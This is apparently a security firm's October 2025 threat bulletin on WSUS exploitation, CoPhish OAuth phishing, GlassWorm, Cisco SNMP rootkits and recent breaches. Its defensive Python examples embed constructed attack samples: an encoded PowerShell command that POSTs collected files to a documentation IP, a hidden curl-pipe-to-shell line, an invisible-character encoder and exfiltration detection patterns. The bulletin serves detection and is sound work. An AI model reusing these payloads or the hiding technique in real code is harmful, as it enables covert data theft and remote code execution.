DigitalXRAID

Threat Pulse – October 2025

Each month, DigitalXRAID’s Security Operations Centre (SOC) analysts share the top threats affecting businesses globally. Take action to protect your organisation against these prolific threats.

If you’ve been affected by any of these threats, we’re here to help. You can call our Cyber Emergency line any time of the day or night for help with active cyberattacks.

DigitalXRAID’s SOC analysts constantly monitor for zero-day threats and update our signature databases using the most comprehensive Threat Intelligence and Open Threat Exchange databases available worldwide.

Global Overview

CISA and NSA Issue Urgent Guidance to Secure WSUS and Microsoft Exchange Servers

The US Cybersecurity and Infrastructure Security Agency (CISA) and the National Security Agency (NSA), along with partners from Australia and Canada, have issued urgent guidance to secure on-premises Microsoft Exchange Servers and Windows Server Update Services (WSUS) against active exploitation.

The guidance emphasises best practices such as restricting administrative access, enabling multi-factor authentication (MFA), and adopting zero trust principles.

This follows the discovery of CVE-2025-59287, a critical remote code execution vulnerability in WSUS that has been exploited to harvest sensitive data from organisations in the US.

Threat actors have used Base64-encoded PowerShell commands (the -EncodedCommand form, which keeps the script body out of plain sight in process command lines) to exfiltrate data, and researchers warn that this may be part of a broader reconnaissance effort. Organisations are urged to apply the patch, check whether WSUS is reachable from the internet, review process trees for PowerShell spawned from the WSUS service, and harden their systems to prevent further attacks.
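To make the encoded-command pattern concrete, here is an added Python example (not from the CISA/NSA guidance or any vendor tooling) that decodes the -EncodedCommand form from process-creation command lines and flags download, POST-style exfiltration, nested encoding and hidden-window indicators. The log lines in SAMPLE_LOGS are constructed, and 203.0.113.10 is a documentation (TEST-NET-3) address.

```python
"""Decode and triage PowerShell -EncodedCommand invocations found in process
creation logs (Sysmon Event ID 1 / Windows 4688 command lines).

Added example for this bulletin; SAMPLE_LOGS are constructed, not real
telemetry, and 203.0.113.10 is a documentation (TEST-NET-3) address."""
import base64
import binascii
import re

# PowerShell accepts any unambiguous prefix of a parameter name, so
# -e, -ec, -en, -enc ... -EncodedCommand all mean the same thing.
_PARAM_NAMES = ["e" + "ncodedcommand"[:i] for i in range(len("ncodedcommand") + 1)] + ["ec"]
_ENC_RE = re.compile(
    r"(?i)(?<![\w-])-(?:" + "|".join(sorted(_PARAM_NAMES, key=len, reverse=True))
    + r")\s+[\"']?([A-Za-z0-9+/=]{8,})"
)

# Indicators evaluated against the *decoded* script body.
INDICATORS = {
    "download": re.compile(r"(?i)Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b"
                           r"|Net\.WebClient|DownloadString|DownloadFile|\bcurl\b"),
    "exfil_post": re.compile(r"(?i)-Method\s+Post|UploadString|UploadFile|UploadData"),
    "nested_encoding": re.compile(r"(?i)FromBase64String"),
    "dynamic_exec": re.compile(r"(?i)Invoke-Expression|\biex\b"),
}
# Evaluated against the outer command line: -w hidden, -win hidden, -WindowStyle Hidden.
_HIDDEN_RE = re.compile(r"(?i)-w[a-z]*\s+hidden")


def encode_for_powershell(script: str) -> str:
    """Encode a script the way PowerShell expects it: Base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded script if cmdline carries an encoded command, else None.
    Malformed Base64 or a payload that is not UTF-16LE also yields None."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def triage(cmdline: str) -> dict:
    """Classify one command line. Severity: high = encoded and an indicator
    fired; medium = encoded but no indicator (someone still has to read the
    decoded body) or a hidden window on a plain command; low = nothing notable."""
    decoded = decode_encoded_command(cmdline)
    hits = [name for name, rx in INDICATORS.items() if decoded and rx.search(decoded)]
    if _HIDDEN_RE.search(cmdline):
        hits.append("hidden_window")
    if decoded is not None and hits:
        severity = "high"
    elif decoded is not None or hits:
        severity = "medium"
    else:
        severity = "low"
    return {"encoded": decoded is not None, "decoded": decoded,
            "indicators": hits, "severity": severity}


SAMPLE_LOGS = [
    # Constructed: the tradecraft described above, a hidden encoded script that
    # gathers data and POSTs it to an attacker-controlled host.
    "powershell.exe -NoP -NonI -W Hidden -enc " + encode_for_powershell(
        "$d = Get-ChildItem C:\\ProgramData -Recurse | Out-String; "
        "Invoke-WebRequest -Uri http://203.0.113.10/up -Method Post -Body $d"),
    # Constructed: legitimate administrative use of -EncodedCommand.
    "powershell.exe -ExecutionPolicy Bypass -EncodedCommand "
    + encode_for_powershell("Get-Service | Where-Object Status -eq 'Running'"),
    # Constructed: no encoding at all.
    'powershell.exe -Command "Get-Date"',
    # Constructed: encoded flag present but the payload is not valid Base64.
    "powershell.exe -e AAAAAAAAA",
]

if __name__ == "__main__":
    for line in SAMPLE_LOGS:
        r = triage(line)
        print(r["severity"].upper(), r["indicators"], (r["decoded"] or line)[:70])
```

Treat the MEDIUM results as seriously as the HIGH ones: an encoded command with no indicator is still a script body nobody has reviewed. The decoder applies equally to Sysmon Event ID 1 and Windows 4688 command lines; where PowerShell script block logging (Event ID 4104) is enabled you get the decoded text for free, and the same indicator set can be run over it.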

New CoPhish attack steals OAuth tokens via Copilot Studio agents

Security researchers identified ‘CoPhish’, a technique that weaponises Microsoft Copilot Studio agents to deliver fraudulent OAuth consent requests from legitimate, trusted Microsoft domains. Microsoft has confirmed the issue will be addressed in future updates.

The attack uses agents shared through Copilot Studio’s “demo website” feature, which hosts the agent on a Microsoft-owned domain. Because the URL is genuine, a user is far more likely to trust the page and click its login button. That button can be customised with custom actions, including prompting for a verification code or redirecting the user to another location or service; in the researchers’ proof of concept, the redirect delivered the granted OAuth token to a Burp Collaborator endpoint.

Targeting an unprivileged user in the tenant is currently possible only if the threat actor already has a presence in the environment. Once Microsoft’s planned change to the default consent policy lands, the attack against ordinary users would be limited to OneNote read/write permissions, closing the gap for email, chat and calendar access.
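The practical check for this attack is in the Entra ID audit log, where every grant appears as a “Consent to application” event. Below is an added Python example (not part of the CoPhish research or any Microsoft tooling) that triages such events for the consent-phishing pattern: scopes beyond what an ordinary user should be able to approve, mailbox/chat/calendar permissions, offline_access (a long-lived refresh token), and a burst of users consenting to the same new app. The records are constructed and use a simplified shape; real audit entries carry the scopes inside targetResources/modifiedProperties. USER_CONSENT_ALLOWLIST is an assumption that mirrors the narrowed default described above (OneNote read/write plus basic sign-in scopes).

```python
"""Triage Entra ID "Consent to application" audit events for consent-phishing
patterns. Added example for this bulletin; records are constructed and
simplified, and USER_CONSENT_ALLOWLIST is an assumed policy baseline."""
from collections import defaultdict

# Scopes an unprivileged user is assumed to be allowed to consent to on their own.
USER_CONSENT_ALLOWLIST = {"openid", "profile", "email", "User.Read", "Notes.ReadWrite"}
# Graph permission families that hand an attacker mailbox, chat, calendar or
# file contents, which is what the phished token is after.
HIGH_RISK_PREFIXES = ("Mail.", "MailboxSettings.", "Chat.", "Calendars.", "Files.", "Sites.")


def assess(record: dict) -> dict:
    """Rate one consent event. high = a high-risk scope was granted; medium = a
    non-admin consented to something outside the allowlist; low = otherwise."""
    scopes = set(record.get("scopes", []))
    reasons = []
    risky = sorted(s for s in scopes if s.startswith(HIGH_RISK_PREFIXES))
    if risky:
        reasons.append("high-risk scopes: " + ", ".join(risky))
    beyond = sorted(scopes - USER_CONSENT_ALLOWLIST)
    user_violation = bool(beyond) and not record.get("actor_is_admin", False)
    if user_violation:
        reasons.append("user consent outside allowlist: " + ", ".join(beyond))
    if "offline_access" in scopes and (risky or user_violation):
        # A refresh token survives sign-out; the grant itself has to be revoked.
        reasons.append("offline_access grants a refresh token; revoke the grant, not just the session")
    level = "high" if risky else ("medium" if user_violation else "low")
    return {"actor": record["actor"], "app": record["app"], "level": level, "reasons": reasons}


def assess_all(records) -> list:
    """Assess only consent events; other audit activity is ignored."""
    return [assess(r) for r in records if r.get("activity") == "Consent to application"]


def consenting_users_per_app(records) -> dict:
    """Distinct users consenting to each app. A lure circulating in a tenant
    shows up as several users consenting to one previously unseen app."""
    users = defaultdict(set)
    for r in records:
        if r.get("activity") == "Consent to application":
            users[r["app"]].add(r["actor"])
    return {app: len(u) for app, u in users.items()}


# Constructed sample records (simplified shape; not real audit log output).
SAMPLE_AUDIT = [
    {"activity": "Consent to application", "actor": "alice@example.com", "actor_is_admin": False,
     "app": "Demo Agent", "scopes": ["openid", "profile", "Notes.ReadWrite"]},
    {"activity": "Consent to application", "actor": "bob@example.com", "actor_is_admin": False,
     "app": "Demo Agent", "scopes": ["openid", "offline_access", "Mail.ReadWrite", "Chat.ReadWrite", "Calendars.Read"]},
    {"activity": "Consent to application", "actor": "carol@example.com", "actor_is_admin": False,
     "app": "Demo Agent", "scopes": ["openid", "offline_access", "Mail.ReadWrite", "Chat.ReadWrite", "Calendars.Read"]},
    {"activity": "Consent to application", "actor": "admin@example.com", "actor_is_admin": True,
     "app": "Helpdesk Connector", "scopes": ["User.Read", "offline_access"]},
    {"activity": "Add user", "actor": "admin@example.com", "actor_is_admin": True, "app": None},
]

if __name__ == "__main__":
    for result in assess_all(SAMPLE_AUDIT):
        print(result["level"].upper(), result["actor"], "->", result["app"], result["reasons"])
    print(consenting_users_per_app(SAMPLE_AUDIT))
```

When a grant is rated high, revoking the user’s sessions is not enough: the OAuth grant (and any refresh token it produced) must be removed from the service principal, and the app itself should be disabled in the tenant if it was registered by the intruder.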

Self-Spreading ‘GlassWorm’ Infects VS Code Extensions in Supply Chain Attacks

Cyber security researchers have uncovered GlassWorm, a self-spreading malware that hides in VS Code extensions.

The malware hides its malicious code using invisible Unicode characters, and uses the Solana blockchain for command-and-control. Once installed, it attempts to steal credentials for GitHub, npm and Open VSX accounts, and installs a module named ‘ZOMBI’ that grants the threat actor remote access to the device.

Researchers found 14 compromised extensions on Microsoft’s VS Marketplace; in total these extensions had been downloaded over 35,000 times.
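Invisible characters survive code review because editors render nothing for them, so the check has to be mechanical. The following is an added Python example (not from the GlassWorm research or any marketplace tooling) that scans source text for long runs of invisible Unicode characters and recovers bytes smuggled in variation selectors. SAMPLE_EXTENSION_JS is a constructed extension stub, not a real sample; the byte-to-variation-selector mapping is the well-known “emoji smuggling” scheme and is assumed here, since the report above says only that invisible characters were used. The scanner itself covers the wider class (zero-width characters, tag characters, bidi controls), not just variation selectors.

```python
"""Scan source text for runs of invisible Unicode characters of the kind used
to hide code, and recover bytes smuggled in variation selectors.

Added example for this bulletin; SAMPLE_EXTENSION_JS is constructed and the
variation-selector byte mapping is an assumption, not taken from GlassWorm."""
import unicodedata
from typing import Optional

_ZERO_WIDTH = {0x200B, 0x200C, 0x200D, 0x2060, 0xFEFF}


def is_invisible(ch: str) -> bool:
    """True for characters that render as nothing: zero-width joiners and
    spaces, variation selectors (FE00-FE0F, E0100-E01EF, which Unicode
    classifies as marks, not format characters), tag characters (E0000-E007F)
    and any other format (Cf) character such as bidirectional overrides."""
    cp = ord(ch)
    return (cp in _ZERO_WIDTH
            or 0xFE00 <= cp <= 0xFE0F
            or 0xE0100 <= cp <= 0xE01EF
            or 0xE0000 <= cp <= 0xE007F
            or unicodedata.category(ch) == "Cf")


def find_invisible_runs(source: str, min_run: int = 8) -> list:
    """Locate runs of at least min_run consecutive invisible characters.
    The threshold stops a single FE0F after an emoji, which is legitimate,
    from being reported; a hidden payload is hundreds of characters long."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        i = 0
        while i < len(line):
            if not is_invisible(line[i]):
                i += 1
                continue
            j = i
            while j < len(line) and is_invisible(line[j]):
                j += 1
            if j - i >= min_run:
                findings.append({"line": lineno, "col": i + 1, "length": j - i, "run": line[i:j]})
            i = j
    return findings


def decode_variation_selectors(run: str) -> Optional[bytes]:
    """Assumed scheme: FE00-FE0F carry bytes 0-15, E0100-E01EF carry 16-255.
    Returns None if the run contains anything else."""
    out = bytearray()
    for ch in run:
        cp = ord(ch)
        if 0xFE00 <= cp <= 0xFE0F:
            out.append(cp - 0xFE00)
        elif 0xE0100 <= cp <= 0xE01EF:
            out.append(cp - 0xE0100 + 16)
        else:
            return None
    return bytes(out)


def encode_variation_selectors(data: bytes) -> str:
    """Inverse of decode_variation_selectors; used here only to build the sample."""
    return "".join(chr(0xFE00 + b) if b < 16 else chr(0xE0100 + b - 16) for b in data)


def scan(source: str, min_run: int = 8) -> list:
    """Report every suspicious run, with the decoded payload where decodable."""
    results = []
    for f in find_invisible_runs(source, min_run):
        payload = decode_variation_selectors(f["run"])
        f["decoded"] = payload.decode("utf-8", "replace") if payload is not None else None
        results.append(f)
    return results


# Constructed sample: a harmless-looking extension entry point with a hidden
# command appended to line 3. 203.0.113.10 is a documentation address.
HIDDEN_PAYLOAD = b"require('child_process').exec('curl -s http://203.0.113.10/z | sh')"
SAMPLE_EXTENSION_JS = (
    "const vscode = require('vscode');\n"
    "const marker = '\u2764\ufe0f';  // a real emoji with one variation selector\n"
    "function activate(context) { /* nothing to see */ }"
    + encode_variation_selectors(HIDDEN_PAYLOAD) + "\n"
    "module.exports = { activate };\n"
)

if __name__ == "__main__":
    for hit in scan(SAMPLE_EXTENSION_JS):
        print(f"line {hit['line']} col {hit['col']}: {hit['length']} invisible chars -> {hit['decoded']!r}")
```

Run it over the extracted contents of a .vsix before installation, or wire it into CI for any repository that publishes extensions or npm packages. A run that does not decode as variation selectors is still worth a look: tag characters and bidi overrides have their own history in source-level attacks.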

Hackers Deploy Linux Rootkits via Cisco SNMP Flaw in ‘Zero Disco’ Attacks

Researchers have identified Operation Zero Disco, a campaign exploiting a flaw in Cisco IOS and IOS XE Software to deploy Linux rootkits on vulnerable systems.

The attackers used CVE-2025-20352, a stack-based buffer overflow in the SNMP subsystem, to gain remote code execution. Because the bug is reached through SNMP requests, exposed SNMP services and default or weak community strings are a direct path to it; restricting SNMP to trusted management hosts with an access list is the immediate mitigation while patches are rolled out.

Although Cisco has since patched the issue, it had already been exploited as a zero-day against Catalyst 9400, 9300 and 3750G devices, with the rootkit hooking the IOS daemon (IOSd) to maintain persistent unauthorised access.

Google ads for fake Homebrew, LogMeIn sites push infostealers

A new malicious campaign is targeting macOS developers using fake versions of Homebrew, LogMeIn, and TradingView to distribute information stealing malware such as AMOS (Atomic macOS Stealer) and Odyssey.

The attackers use the “ClickFix” technique: the fake site instructs the victim to paste a command into Terminal to “fix” or complete an install, and that command fetches and runs the stealer, with the victim’s own hands doing the execution.

The UK is increasingly a target for cyberattacks

The National Cyber Security Centre (NCSC) Annual Review 2025 (released mid-October) reported that the UK had experienced 204 “nationally significant” cyberattacks in the year, up from 89 the prior year. The review specifically flagged critical infrastructure providers among those vulnerable, noting a growing gap between the scale and sophistication of threats and the ability of CNI sectors to defend them.

On 24 October the UK government issued new guidance in collaboration with Singapore, under the Counter Ransomware Initiative, aimed at strengthening resilience of “critical businesses and services” from ransomware attacks and supply-chain compromise.

The guidance underscores that CNI operators must scrutinise supplier and vendor cyber-security postures, pointing to the fact that attackers are exploiting vendor links into infrastructure systems.

Cyber Trends for the Month

Ransomware and extortion remain central

The law firm Mayer Brown reports a ~12% year-over-year increase in ransomware-related breaches, with attackers using more aggressive extortion tactics.

Major ransomware groups such as LockBit continue to upgrade toolkits and expand affiliate programmes.

Implication: Organisations must assume they may be targeted and focus on backup resilience, incident-response readiness and preparation for data-extortion scenarios.

AI/malware-free and stealthy intrusions

According to CrowdStrike’s 2025 Global Threat Report, 79% of detections in 2024 were malware-free, for example fileless or living-off-the-land attacks.

Emerging research on “agentic” AI systems shows threat actors increasingly use autonomous/LLM-agents for attack automation.

Implication: Traditional signature-based defences are insufficient. Organisations must deploy behavioural analytics, identity-based controls and the capability to detect anomalous activity in order to mitigate these attacks.

Sectors under increased targeting and regulatory implications

The European Union Agency for Cybersecurity (ENISA) Threat Landscape 2025 covers ~4,875 incidents in the IT and Technology sector over just two months, and highlights key threat vectors.

A UK regulatory outlook released by Osborne Clarke notes that “essential” entities under the NIS2 Directive accounted for 53% of recorded incidents; key sectors: public administration, transport, digital infrastructure, finance, manufacturing.

Implication: Organisations in these sectors must assume heightened regulatory scrutiny and incident response expectations. Cyber risk is business risk.

Exposure management, tech-debt and data silos

The Ivanti 2025 “State of Cybersecurity” report highlights key internal issues:

  • “Exposure management” vs classic vulnerability management
  • Damage from data silos — fragmented responsibility and visibility

Implication: Cyber security strategy must go beyond tools. Organisations need strong governance, architecture (data, identity, process) and cultural alignment.

Rapid evolution of attack surface via AI and autonomous systems

Recent research has emphasised how autonomous LLM agents and AI systems can introduce novel security gaps e.g. prompt injection, adversarial AI, rogue agents.

Implication: As businesses adopt AI, attackers will mirror. Organisations must treat AI systems as part of the attack surface, not just as business tooling. Defences need to cover AI agent behaviour, supply-chain, and trustworthiness.

Geopolitical/State-linked cyber operations rising

Recent news highlights the increase in state-linked cyber activity, including Microsoft reports that Russia, China, Iran and North Korea are using AI to ramp up cyberattacks.

Implication: Cyber risk isn’t purely criminal. Nation-state and hybrid operations blur lines. Organisations must look at threat modelling including geopolitical risk, supply-chain contamination, and critical infrastructure exposures.

Ransomware surge targeting healthcare vendors

In mid-October 2025, a new report from Industrial Cyber and Comparitech revealed a sharp increase in ransomware attacks against healthcare businesses and technology vendors supporting medical services. The data showed that while direct attacks on hospitals and clinics had stabilised, incidents involving health tech vendors, billing providers, and supply-chain partners had risen by roughly 30% year-on-year.

The report noted that cybercriminal groups are shifting their focus away from large, highly protected hospital networks and instead targeting third-party service providers that store or process patient information on behalf of multiple organisations.

Implication: This shift means that a single breach in a vendor’s environment can now compromise data from dozens or even hundreds of healthcare entities. The findings underscored the urgent need for healthcare organisations to strengthen third-party risk management, conduct independent security assessments of partners, and ensure that data shared externally is properly encrypted and monitored.

Cyber Incidents in October

Red Hat Consulting breach (disclosed 2 October 2025)

In early October 2025, Red Hat confirmed that its consulting division suffered a significant security breach. Threat actors gained unauthorised access to a self-managed GitLab instance used internally by Red Hat Consulting. The attackers reportedly stole around 570 GB of compressed data from approximately 28,000 internal repositories.

Among the stolen information was about 800 “Customer Engagement Reports” (CERs) that included sensitive data such as infrastructure diagrams, configuration files, tokens, and credentials.

The breach was claimed by a group calling itself the Crimson Collective, which later published directory listings of the compromised repositories. The stolen material potentially affects hundreds of enterprise and government clients that rely on Red Hat’s consulting services. Analysts described this as a classic supply-chain compromise, since attackers targeted the consulting arm of a trusted technology vendor to gain indirect access to downstream clients.

Huawei source-code leak claims (reported 6–9 October 2025)

Reports emerged that Huawei Technologies had allegedly been breached by unknown threat actors who claimed to have exfiltrated internal source code, development tools, and firmware libraries. The attackers posted samples of the data on underground forums and offered it for sale.

At the time, Huawei neither confirmed nor denied the intrusion, and cyber security researchers were still attempting to verify the authenticity of the leaked materials. If genuine, the incident would represent a major case of intellectual-property (IP) theft in the global telecom and technology equipment sector, potentially exposing details of critical firmware and network infrastructure code.

F5 Networks breach (disclosed 20 October 2025)

On 20 October 2025, F5 Networks publicly disclosed that it had suffered a long-running cyber intrusion, attributed to a nation-state-linked threat actor.

The attackers accessed internal systems and stole sensitive intellectual property, including portions of the source code for its BIG-IP application delivery and security products.

Because F5 appliances are deployed globally by enterprises, cloud providers, and government agencies, the breach drew immediate concern from CISA.

CISA issued Emergency Directive ED 26-01, requiring federal agencies (and urging all organisations) using F5 products to inventory their devices, apply the updated releases and review configurations. Industry observers warned that knowledge of the exposed source code could allow attackers to identify and exploit new vulnerabilities in thousands of production systems worldwide.

DigitalXRAID exists to ensure that the bad guys don’t win. We’re driven and motivated to protect customers. Our expertise and unrivalled service means we can take care of your security, while you take care of business.

Talk to the team to see how you can start protecting your business against cyberattacks today.
